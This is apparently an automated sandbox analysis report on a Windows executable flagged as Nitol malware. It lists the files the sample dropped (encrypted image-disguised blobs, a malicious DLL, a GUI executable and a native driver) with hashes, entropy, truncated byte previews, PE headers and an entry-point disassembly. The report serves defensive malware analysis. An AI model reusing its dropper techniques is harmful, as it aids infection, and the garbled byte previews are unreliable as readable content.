                      T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):10681
                        Entropy (8bit):7.866148090449211
                        Encrypted:false
                        SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                        MD5:10A818386411EE834D99AE6B7B68BE71
                        SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                        SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                        SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                        Malicious:false
                        Reputation:low
                        Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):3892010
                        Entropy (8bit):7.995495589600101
                        Encrypted:true
                        SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                        MD5:E4E46F3980A9D799B1BD7FC408F488A3
                        SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                        SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                        SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                        Malicious:false
                        Reputation:low
                        Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):5.275203330875829
                        Encrypted:false
                        SSDEEP:6:WSku4rj7zd3kiaqK+CrCa2BIDRD/COkngwAqwVLEFG7OdUzW9E40/qcX:Yrrj7ZUiaVMBIDRlqkEFggUzWg3
                        MD5:7E4165B1411CF0914B7DB88CBD5C6A68
                        SHA1:B6BAA59BE8644C12B1926B42B8701CCF321CAECE
                        SHA-256:E0F4DABA7B631080FCAB4682C2A2EA64CCE957C08B32683E5F03E0515B4576E0
                        SHA-512:5EA8834BDD607A75B0887D38058F20D50E96A01ED68EFA1632A9C77F2686834CF333DCF10138827847E3BD39D174F5DD4B0C2FE335AB4D6886A6AD1393EE0A00
                        Malicious:false
                        Reputation:low
                        Preview:....l%00]CT.rp/n..C.c oh....a(gj....gw*g..H.(ao`````````````````````````````````....c*??RL[.}. a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33^@W.qs,m..@.`#lk....b+di....dt)d..K.)`naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....b+>>SMZ.|~!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):125333
                        Entropy (8bit):7.993522712936246
                        Encrypted:true
                        SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                        MD5:2CA9F4AB0970AA58989D66D9458F8701
                        SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                        SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                        SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                        Malicious:false
                        Reputation:low
                        Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                        Category:dropped
                        Size (bytes):8299
                        Entropy (8bit):7.9354275320361545
                        Encrypted:false
                        SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                        MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                        SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                        SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                        SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                        Malicious:false
                        Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):135589
                        Entropy (8bit):7.995304392539578
                        Encrypted:true
                        SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                        MD5:0DDD3F02B74B01D739C45956D8FD12B7
                        SHA1:561836F6228E24180238DF9456707A2443C5795C
                        SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                        SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                        Malicious:false
                        Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):28272
                        Entropy (8bit):7.711647785362456
                        Encrypted:false
                        SSDEEP:384:9/egCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQA:M5F1FUdy422IK+gAZt2i0YPpQn4GMP
                        MD5:58FF4EFABA7301817BE7A2CED40CB7A7
                        SHA1:1A3514D86B7A89530C777CAACB7F216B4B84C243
                        SHA-256:1883E097CC9EDD5F63376AC7F6700B73A522F0049F61E5569EFBA7EA7F9FEA1D
                        SHA-512:5F7EA7E96A9CE17D7FB8E94858EE50E35BA82E11F623DE02AD20788C1971E5DAD861E070AE1E8A3F5E1427CAEA3519225C933A0C6243A6F24EFDF9A47BFA529F
                        Malicious:false
                        Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbbBocbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):3889557
                        Entropy (8bit):7.999938755618313
                        Encrypted:true
                        SSDEEP:98304:3AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:wndLOZS/DtpPJRO8OHBL4f2UQI+A
                        MD5:529E67E171FBC2AE4C82B35FF2D91B46
                        SHA1:7DD75431D13FB906815342630CF3A4291422C04C
                        SHA-256:F2ABF785314B69CA48947CEA1FCA1D858631E516B44D8C6CF14C6328A73DD196
                        SHA-512:62075A2907014E3792CEBB5CB792343DB36129F0836700757DF2EDB21A8193E28A61B61E380ACF783E432FB6134B12858A4E49234EF8EDA437ABC413A37035BD
                        Malicious:false
                        Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:GIF image data, version 89a, 10 x 10
                        Category:dropped
                        Size (bytes):8228
                        Entropy (8bit):7.978988896012011
                        Encrypted:false
                        SSDEEP:192:eBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:eBuNhyTlBU2dp+1XrBuCgp9vU0l
                        MD5:3E702B26698C1C4E4AF3CBF9714A6C6A
                        SHA1:56E54D7ED30408B25D1C6DA4E12CA58105A572BB
                        SHA-256:D1A005AE6F4B652373731B46FCA54EFDB0DAEE07F18DA0260E29C4AEFF6309B7
                        SHA-512:7B60D939CC2DE6916103FFD1126DAD4DA1D50DBB281EEF6C7D70F91B83B4D893A5FDB84867F7591710C5A3CDD47402EC8095DFE924FE3BB204521F6642D19A2D
                        Malicious:false
                        Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):122880
                        Entropy (8bit):6.002024547813738
                        Encrypted:false
                        SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fg:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gg
                        MD5:715DC06546CA7469F243C7E85AEBE4CD
                        SHA1:A8896FFBF543528FEBB60BAA1751F3731AE746C5
                        SHA-256:84571B4EC20482FBD68976779FB0B640CE7286692DC8D39466653F57BDD67F93
                        SHA-512:FA402BD5340FBBF14D1E65761825C380E8AA49B3CD158C5D3C77F7A3B601B35FAFA2164712B0C77531A8FE7B5B128BC869EFCA119316BB51E6DDC5DE98215DC2
                        Malicious:true
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):133136
                        Entropy (8bit):6.350273548571922
                        Encrypted:false
                        SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                        MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                        SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                        SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                        SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: 45631.exe, Detection: malicious, Browse
                        • Filename: 45631.exe, Detection: malicious, Browse
                        • Filename: 0000000000000000.exe, Detection: malicious, Browse
                        • Filename: 0000000000000000.exe, Detection: malicious, Browse
                        • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        File Type:PE32+ executable (native) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):28272
                        Entropy (8bit):6.229029729605085
                        Encrypted:false
                        SSDEEP:384:j3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/r:jOUkgfdZ9pRyv+uPzCMHo3q4tDghV
                        MD5:FE9AF4CC7F9E8B1AF459708D5FC73740
                        SHA1:C7B6BA17735ACA976E3CB9F9080020E4599C758B
                        SHA-256:8E1DB4A4123D79A8A72BC00CB6415463FE816EC80D560DDF842551609638C346
                        SHA-512:A15A91D40FF5463748EFAA972613D8473C8FAF0E1B40A1C08143C91AB583D70DE860A8D31B781E528CF3143497988DC99CCDA3F6C42771B019E8F9658247E6EE
                        Malicious:true
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l............................................... ...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                        Entropy (8bit):0.08017653910042216
                        TrID:
                        • Win64 Executable GUI (202006/5) 92.65%
                        • Win64 Executable (generic) (12005/4) 5.51%
                        • Generic Win/DOS Executable (2004/3) 0.92%
                        • DOS Executable Generic (2002/1) 0.92%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:2b687482300.6345827638.08.exe
                        File size:30'883'840 bytes
                        MD5:934c8c307939cd29f7d1d434f1ad09ef
                        SHA1:452e15ee56888ad6424a15efc523dfc8137516b0
                        SHA256:3fdcdf14ff5cb781cda7b1920d229ee59b3684b1d9b1ef939d0549ae0f8815be
                        SHA512:c20efecf3985c68ce13e4a0d55a8be54f8e0df3de98fd5eef69e733513ba70dbc33eded5fa645213baf5195c3ad0961486d1d171726736036032ae4cc9c694f1
                        SSDEEP:3072:oz1SlI+SwI3HOOp1I2nb5ZuJrSyUQZYX+70ZUoo/YhHTZtgXbPx:Ikx1I3uOb5fYFAZUoo/UzgX
                        TLSH:FC678D1BA3E434E9E0BA4635C9921A16A772B83157309B6F03B0564EDF336C1DD3AF25
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.0...c...c...c..0c...c..2c...c..3c...c.e.b...c.e.b...c.e.b...c.uBc...c.uRc...c...c4..c.d.b...c.d>c...c..Vc...c.d.b...cRich...
                        Icon Hash:57171d4de7912e31
                        Entrypoint:0x140005590
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x140000000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66E5AF10 [Sat Sep 14 15:43:12 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:2
                        File Version Major:5
                        File Version Minor:2
                        Subsystem Version Major:5
                        Subsystem Version Minor:2
                        Import Hash:f61665c78859eaa1c3d43a70d740946a
                        Instruction
                        dec eax
                        sub esp, 28h
                        call 00007F2F10825F60h
                        dec eax
                        add esp, 28h
                        jmp 00007F2F1082160Fh
                        int3
                        int3
                        inc eax
                        push ebx
                        dec eax
                        sub esp, 20h
                        dec eax
                        mov ebx, ecx
                        dec eax
                        mov eax, edx
                        dec eax
                        lea ecx, dword ptr [0000AEC1h]
                        dec eax
                        mov dword ptr [ebx], ecx
                        dec eax
                        lea edx, dword ptr [ebx+08h]
                        xor ecx, ecx
                        dec eax
                        mov dword ptr [edx], ecx
                        dec eax
                        mov dword ptr [edx+08h], ecx
                        dec eax
                        lea ecx, dword ptr [eax+08h]
                        call 00007F2F10826779h
                        dec eax
                        lea eax, dword ptr [0000AED1h]
                        dec eax
                        mov dword ptr [ebx], eax
                        dec eax
                        mov eax, ebx
                        dec eax
                        add esp, 20h
                        pop ebx
                        ret
                        int3
                        dec eax
                        and dword ptr [ecx+10h], 00000000h
                        dec eax
                        lea eax, dword ptr [0000AEC8h]
                        dec eax
                        mov dword ptr [ecx+08h], eax
                        dec eax
                        lea eax, dword ptr [0000AEADh]
                        dec eax
                        mov dword ptr [ecx], eax
                        dec eax
                        mov eax, ecx
                        ret
                        int3
                        int3
                        inc eax
                        push ebx
                        dec eax
                        sub esp, 20h
                        dec eax
                        mov ebx, ecx
                        dec eax
                        mov eax, edx
                        dec eax
                        lea ecx, dword ptr [0000AE61h]
                        dec eax
                        mov dword ptr [ebx], ecx
                        dec eax
                        lea edx, dword ptr [ebx+08h]
                        xor ecx, ecx
                        dec eax
                        mov dword ptr [edx], ecx
                        dec eax
                        mov dword ptr [edx+08h], ecx
                        dec eax
                        lea ecx, dword ptr [eax+08h]
                        call 00007F2F10826719h
                        dec eax
                        lea eax, dword ptr [0000AE99h]
                        dec eax
                        mov dword ptr [ebx], eax
                        dec eax
                        mov eax, ebx
                        dec eax
                        add esp, 20h
                        pop ebx
                        ret
                        int3
                        dec eax
                        and dword ptr [ecx+10h], 00000000h
                        dec eax
                        lea eax, dword ptr [0000AE90h]
                        dec eax
                        mov dword ptr [ecx+08h], eax
                        dec eax
                        lea eax, dword ptr [00000075h]
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x191140x8c.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d760000x26f0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d750000xe58.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x17e000x1c.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x17e200x100.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x100000x380.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xe3c00xe40074c9f413e23c91457ada02b035828ec6False0.5602042214912281data6.360089498833491IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x100000x9c960x9e001b8182317a0d8e6cd95b38978641fbc6False0.4228144778481013data4.802779184711532IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x1a0000x1d5ac800x1d58200794aff82a6a5298243f654707e6052adunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata0x1d750000xe580x1000eb973d7d4e8ec7bd6e226dea768287a0False0.4375data4.484533884288873IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x1d760000x26f00x2800d4f254994b637ef2ef36a284dda0b85dFalse0.312109375data4.28882495799986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x1d766100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4032258064516129
                        RT_ICON0x1d768f80x130Device independent bitmap graphic, 32 x 64 x 1, image size 128EnglishUnited States0.41776315789473684
                        RT_ICON0x1d76a280xb0Device independent bitmap graphic, 32 x 32 x 1, image size 64EnglishUnited States0.45454545454545453
                        RT_ICON0x1d76ad80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5472972972972973
                        RT_ICON0x1d76c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3835740072202166
                        RT_ICON0x1d774a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.5455202312138728
                        RT_DIALOG0x1d77a700x784dataEnglishUnited States0.3186070686070686
                        RT_DIALOG0x1d781f80x252dataEnglishUnited States0.5218855218855218
                        RT_STRING0x1d784500x6adataEnglishUnited States0.6792452830188679
